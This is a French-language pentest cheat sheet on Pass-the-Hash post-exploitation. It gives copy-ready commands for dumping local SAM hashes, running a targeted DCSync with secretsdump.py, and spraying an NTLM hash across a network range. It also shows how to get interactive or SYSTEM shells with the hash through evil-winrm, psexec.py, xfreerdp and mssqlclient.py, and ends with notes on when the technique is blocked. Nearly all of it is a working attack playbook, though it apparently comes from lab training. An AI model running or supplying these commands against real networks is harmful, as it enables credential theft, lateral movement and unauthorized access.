Post-Exploitation

Pass-the-Hash

S'authentifier avec un hash NTLM plutôt qu'un mot de passe en clair, sur SMB, WinRM, RDP et MSSQL.

Obtenir le hash NTLM

Copy command
nxc smb $TARGET -u $USER -p $PASS --sam

Description: Dump SAM local : le point de départ classique, surtout si le mot de passe Administrator local est réutilisé sur d'autres machines.

Copy command
secretsdump.py $DOMAIN/$USER:$PASS@$DC -just-dc-user $TARGET_USER

Description: DCSync ciblé : hash NTLM propre d'un compte de domaine, sans toucher LSASS.

Réutiliser le hash

Copy command
nxc smb $CIDR -u $USER -H $NTHASH --local-auth -x 'whoami'

Description: Spray du hash sur toute la plage réseau : trouver où le compte local est réutilisé, en une commande.

Copy command
evil-winrm -i $TARGET -u $USER -H $NTHASH

Description: Shell PowerShell interactif via WinRM avec le hash, sans jamais avoir vu le mot de passe en clair.

Copy command
psexec.py -hashes :$NTHASH $DOMAIN/$USER@$TARGET

Description: Shell SYSTEM via un service temporaire : bruyant (crée/supprime un service) mais fiable.

Copy command
xfreerdp /v:$TARGET /u:$USER /pth:$NTHASH

Description: RDP avec le hash sans mot de passe : nécessite Restricted Admin Mode activé côté cible (souvent le cas par défaut sur les configs par défaut d'un lab, pas en prod durcie).

Copy command
mssqlclient.py -hashes :$NTHASH $DOMAIN/$USER@$TARGET

Description: Authentification MSSQL par PtH : accès direct sans mot de passe si l'auth Windows est utilisée côté SQL.

Limites

Copy command
# PtH nécessite un accès admin local (ou équivalent) sur la cible : ce n'est pas un bypass d'authentification générique

Description: Le hash remplace le mot de passe dans le protocole NTLM, mais les droits accordés restent ceux du compte : un hash d'utilisateur standard ne donne pas plus de droits que le mot de passe ne l'aurait fait.

Copy command
# Protected Users / SMB signing forcé / comptes dans un domaine avec NTLM désactivé -> PtH bloqué

Description: Un compte dans le groupe Protected Users refuse NTLM (Kerberos AES uniquement) : STATUS_ACCOUNT_RESTRICTION à l'authentification, vu en conditions réelles sur HTB Pro Lab Tengu et Dante. Il faut alors passer par Overpass-the-Hash / Pass-the-Ticket.